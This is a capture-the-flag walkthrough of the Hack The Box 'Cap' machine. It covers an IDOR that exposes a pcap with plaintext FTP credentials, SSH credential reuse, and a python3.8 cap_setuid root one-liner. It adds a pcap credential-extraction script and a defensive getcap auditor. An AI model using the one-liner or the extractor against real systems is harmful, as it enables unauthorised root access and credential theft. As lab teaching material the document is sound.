[HTB] Cap (packet analysis, Python with the cap_setuid capability)

2022-02-01 15:20:49 Antenna pot


The host penetrated in this article is legally authorized. The tools and methods used in this article are for learning and exchange only; please do not use the tools and ideas from this article for any illegal purpose. I am not responsible for any consequences of doing so, nor for any misuse or damage caused.

Service detection

└─# nmap -sV -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( ) at 2021-11-28 08:33 EST
Nmap scan report for
Host is up (0.35s latency).
Not shown: 997 closed ports
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    gunicorn
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :

Service enumeration analysis

FTP: anonymous login is not allowed.

Directory brute-forcing found nothing.

Port 80 serves a network-administration style dashboard (no login required). It has three sections corresponding to ifconfig, netstat, and a traffic capture service (which lets you download the resulting pcap file).

Port 80 looks like the main attack surface.

The dashboard shows the user name: nathan

This page generates a new pcap file every 5 seconds; you can download the most recent one, and the capture numbers it hands out cycle through 1-5.

But the capture holding the login information is hidden under number 0, which the page never offers. That is to say, the download endpoint trusts the numeric ID in the request and performs no ownership check, so asking for number 0 directly returns a capture you were never meant to see: a textbook insecure direct object reference (IDOR).

Surprised? Not surprised?

Download pcap number 0 locally and open it in Wireshark.

Frame 36 contains the FTP user name: nathan

Frame 40 contains the FTP password: {not telling you}

FTP sends credentials in clear text, so USER and PASS appear verbatim in the control channel on port 21; any capture of an FTP login leaks them.
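The same extraction done programmatically, as an added example that is not part of the original write-up: a standard-library-only parser that walks a classic pcap, keeps only client-to-server FTP control traffic (destination port 21) and pairs each USER with the PASS that follows it on the same flow, reporting Wireshark-style frame numbers. The capture it runs on is constructed inline (placeholder addresses from 192.0.2.0/24 and a placeholder password; the real password is redacted above). pcapng files and non-Ethernet link types are not handled, and checksums are not verified.

```python
"""Pull FTP USER/PASS pairs out of a classic pcap with the standard library only."""
import socket
import struct
from typing import Dict, Iterator, List, Optional, Tuple

ETH_P_IP = 0x0800
IPPROTO_TCP = 6
FTP_PORT = 21


def build_frame(src: str, dst: str, sport: int, dport: int, payload: bytes) -> bytes:
    """Build a minimal Ethernet/IPv4/TCP frame (constructed test data; checksums left at zero)."""
    eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + struct.pack("!H", ETH_P_IP)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0x4000, 64,
                     IPPROTO_TCP, 0, socket.inet_aton(src), socket.inet_aton(dst))
    return eth + ip + tcp


def build_pcap(frames: List[bytes]) -> bytes:
    """Wrap frames in a little-endian classic pcap (link type 1 = Ethernet)."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1_700_000_000 + i, 0, len(frame), len(frame)) + frame
    return out


def iter_packets(data: bytes) -> Iterator[Tuple[int, bytes]]:
    """Yield (frame_number, frame_bytes); numbering starts at 1 like Wireshark's."""
    magic = struct.unpack("<I", data[:4])[0]
    if magic == 0xA1B2C3D4:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    link_type = struct.unpack(endian + "I", data[20:24])[0]
    if link_type != 1:
        raise ValueError(f"unsupported link type {link_type}; only Ethernet is parsed")
    offset, number = 24, 0
    while offset + 16 <= len(data):
        _, _, incl_len, _ = struct.unpack(endian + "IIII", data[offset:offset + 16])
        offset += 16
        number += 1
        yield number, data[offset:offset + incl_len]
        offset += incl_len


def tcp_payload(frame: bytes) -> Optional[Tuple[str, str, int, int, bytes]]:
    """Return (src, dst, sport, dport, payload) for an IPv4/TCP frame, else None."""
    if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETH_P_IP:
        return None
    ihl = (frame[14] & 0x0F) * 4          # IPv4 header length from the IHL nibble
    if frame[14 + 9] != IPPROTO_TCP:
        return None
    src, dst = socket.inet_ntoa(frame[26:30]), socket.inet_ntoa(frame[30:34])
    tcp = frame[14 + ihl:]
    if len(tcp) < 20:
        return None
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_off = (tcp[12] >> 4) * 4         # TCP header length from the data-offset nibble
    return src, dst, sport, dport, tcp[data_off:]


def extract_ftp_credentials(pcap: bytes) -> List[Dict[str, object]]:
    """Pair each USER with the PASS that follows it on the same client flow."""
    pending: Dict[Tuple[str, str, int], Tuple[str, int]] = {}
    found: List[Dict[str, object]] = []
    for number, frame in iter_packets(pcap):
        parsed = tcp_payload(frame)
        if parsed is None:
            continue
        src, dst, sport, dport, payload = parsed
        if dport != FTP_PORT or not payload:
            continue                      # only client -> server control traffic carries USER/PASS
        flow = (src, dst, sport)
        for line in payload.decode("ascii", "replace").splitlines():
            cmd, _, arg = line.partition(" ")
            if cmd.upper() == "USER":
                pending[flow] = (arg, number)
            elif cmd.upper() == "PASS" and flow in pending:
                user, user_pkt = pending.pop(flow)
                found.append({"client": src, "server": dst, "user": user,
                              "user_packet": user_pkt, "password": arg, "pass_packet": number})
    return found


# Constructed capture (placeholder addresses and password): an HTTP request that must be
# ignored, then the FTP login exchange as seen in the write-up.
CLIENT, SERVER = "192.0.2.10", "192.0.2.20"
SAMPLE_PCAP = build_pcap([
    build_frame(CLIENT, SERVER, 40000, 80, b"GET / HTTP/1.1\r\nHost: example\r\n\r\n"),  # 1: not FTP
    build_frame(SERVER, CLIENT, 21, 54321, b"220 (vsFTPd 3.0.3)\r\n"),                 # 2: banner
    build_frame(CLIENT, SERVER, 54321, 21, b"USER nathan\r\n"),                        # 3
    build_frame(SERVER, CLIENT, 21, 54321, b"331 Please specify the password.\r\n"),    # 4
    build_frame(CLIENT, SERVER, 54321, 21, b"PASS example-password-here\r\n"),          # 5
    build_frame(SERVER, CLIENT, 21, 54321, b"230 Login successful.\r\n"),               # 6
])

if __name__ == "__main__":
    for cred in extract_ftp_credentials(SAMPLE_PCAP):
        print(f"frame {cred['user_packet']}: USER {cred['user']}   "
              f"frame {cred['pass_packet']}: PASS {cred['password']}   "
              f"({cred['client']} -> {cred['server']})")
```

On the real download, pass open(path, "rb").read() to extract_ftp_credentials. The equivalent Wireshark display filter is ftp.request.command == "USER" || ftp.request.command == "PASS".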

Log in to FTP

└─# ftp
Connected to
220 (vsFTPd 3.0.3)
Name ( nathan
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 1001     1001         4096 May 27  2021 .
drwxr-xr-x    3 0        0            4096 May 23  2021 ..
lrwxrwxrwx    1 0        0               9 May 15  2021 .bash_history -> /dev/null
-rw-r--r--    1 1001     1001          220 Feb 25  2020 .bash_logout
-rw-r--r--    1 1001     1001         3771 Feb 25  2020 .bashrc
drwx------    2 1001     1001         4096 May 23  2021 .cache
-rw-r--r--    1 1001     1001          807 Feb 25  2020 .profile
lrwxrwxrwx    1 0        0               9 May 27  2021 .viminfo -> /dev/null
-r--------    1 1001     1001           33 Nov 28 15:32 user.txt
226 Directory send OK.

We have successfully logged in to FTP; this appears to be nathan's home directory. We can see user.txt, but we don't have permission to read it.

Initial shell

Many lazy administrators reuse the same credentials across services, so try the credentials found above against SSH.

└─# ssh nathan@<target-ip>
The authenticity of host ' (' can't be established.
ECDSA key fingerprint is SHA256:8TaASv/TRhdOSeq3woLxOcKrIOtDhrZJVrrE0WbzjSc.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (ECDSA) to the list of known hosts.
nathan@<target-ip>'s password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:
 * Management:
 * Support:

  System information as of Sun Nov 28 16:00:07 UTC 2021

  System load:  0.0               Processes:             225
  Usage of /:   36.6% of 8.73GB   Users logged in:       0
  Memory usage: 21%               IPv4 address for eth0:
  Swap usage:   0%

  => There are 2 zombie processes.

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

63 updates can be applied immediately.
42 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Thu May 27 11:21:27 2021 from
nathan@cap:~$ pwd
nathan@cap:~$ ls 

Get user.txt

Privilege escalation

Uploading and running linpeas shows that python carries the setuid capability (the manual equivalent is getcap -r / 2>/dev/null):

/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip

Escalate with python. Because cap_setuid is in the binary's effective set (the e in +eip), os.setuid(0) succeeds for an unprivileged caller and the shell it spawns runs as uid 0; the gid stays 1001, as the id output shows:

nathan@cap:~$ /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# id       
uid=0(root) gid=1001(nathan) groups=1001(nathan)
# whoami
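The check a defender (or a pentester triaging linpeas output) would want, as an added example that is not part of the original write-up: an auditor that parses getcap -r output, accepts both the older "path = caps+flags" and the newer "path caps=flags" syntax, and rates each finding by whether the capability is root-equivalent, whether the binary is an interpreter that runs attacker-supplied code, and whether the capability is already effective (the e flag) or only permitted (p, which an attacker must first raise with capset(2), for example through ctypes). The sample lines are constructed; the first one is the finding from this box.

```python
"""Rate file-capability findings from `getcap -r / 2>/dev/null` output."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Capabilities that hand out root (or the equivalent) to whoever controls the code path.
ROOT_EQUIVALENT = {
    "cap_setuid": "setuid(0) from any code the binary runs",
    "cap_setgid": "setgid(0) / arbitrary supplementary groups",
    "cap_dac_override": "bypass file permission checks (read /etc/shadow, write /etc/passwd)",
    "cap_dac_read_search": "read any file and traverse any directory",
    "cap_sys_admin": "mount and many other root-equivalent operations",
    "cap_sys_ptrace": "attach to and inject into root processes",
    "cap_sys_module": "load kernel modules",
    "cap_chown": "chown any file",
    "cap_fowner": "chmod files owned by others",
    "cap_setfcap": "grant file capabilities to other binaries",
}

# Binaries that will happily execute whatever the calling user types (list is illustrative).
INTERPRETER = re.compile(r"/(python[0-9.]*|perl[0-9.]*|ruby[0-9.]*|php[0-9.]*|node|lua[0-9.]*|gdb|vim|view)$")

# Accepts both getcap output styles and the "=ep" shorthand (empty list = every capability):
#   older libcap:  "/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip"
#   newer libcap:  "/usr/bin/python3.8 cap_setuid,cap_net_bind_service=eip"
GETCAP_LINE = re.compile(r"^(?P<path>\S+)\s*=?\s*(?P<caps>[a-z_,]*)[+=](?P<flags>[eip]+)$")


@dataclass
class Finding:
    path: str
    caps: List[str]
    flags: str              # subset of "eip": effective, inheritable, permitted
    severity: str           # critical / high / medium / info
    reasons: List[str] = field(default_factory=list)

    def remediation(self) -> str:
        return f"setcap -r {self.path}" if self.severity != "info" else "no action needed"


def parse_getcap_line(line: str) -> Optional[Tuple[str, List[str], str]]:
    """Return (path, caps, flags) or None for lines that are not findings (errors, noise)."""
    m = GETCAP_LINE.match(line.strip())
    if not m:
        return None
    caps = [c for c in m["caps"].split(",") if c] or ["all"]
    return m["path"], caps, m["flags"]


def assess(path: str, caps: List[str], flags: str) -> Finding:
    """Severity depends on which capability, on what kind of binary, and on the e flag."""
    dangerous = list(ROOT_EQUIVALENT) if caps == ["all"] else [c for c in caps if c in ROOT_EQUIVALENT]
    if not dangerous:
        return Finding(path, caps, flags, "info", ["no root-equivalent capability"])
    reasons = [f"{c}: {ROOT_EQUIVALENT[c]}" for c in dangerous]
    if INTERPRETER.search(path) and "e" in flags:
        severity = "critical"
        reasons.append("interpreter with the capability already effective: a one-liner gives root")
    elif INTERPRETER.search(path):
        severity = "high"
        reasons.append("permitted but not effective: attacker must raise it with capset(2) first")
    else:
        severity = "medium"
        reasons.append("not an interpreter: exploitable only if the binary can be steered to "
                       "attacker-controlled code or attacker-chosen files")
    return Finding(path, caps, flags, severity, reasons)


def audit(lines: List[str]) -> List[Finding]:
    """Run every parseable getcap line through assess(); unparseable lines are skipped."""
    findings = []
    for line in lines:
        parsed = parse_getcap_line(line)
        if parsed:
            findings.append(assess(*parsed))
    return findings


# Constructed sample output; the first line is the real finding from this box.
SAMPLE_GETCAP = [
    "/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip",
    "/usr/bin/ping = cap_net_raw+ep",
    "/usr/bin/perl cap_dac_read_search=p",
    "/opt/backup-agent = cap_dac_override+ep",
    "Failed to get capabilities of file '/proc/1/exe' (No such file or directory)",
]

if __name__ == "__main__":
    for f in audit(SAMPLE_GETCAP):
        print(f"[{f.severity:8}] {f.path} ({','.join(f.caps)}+{f.flags}) -> {f.remediation()}")
        for r in f.reasons:
            print(f"             {r}")
```

The fix on the box is the remediation the auditor prints for the critical finding: strip the capability from the interpreter and, if something genuinely needs to bind a low port, give cap_net_bind_service to that one purpose-built binary rather than to python.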

Copyright notice
Author: [Antenna pot]. Please include the original link when reprinting. Thank you.

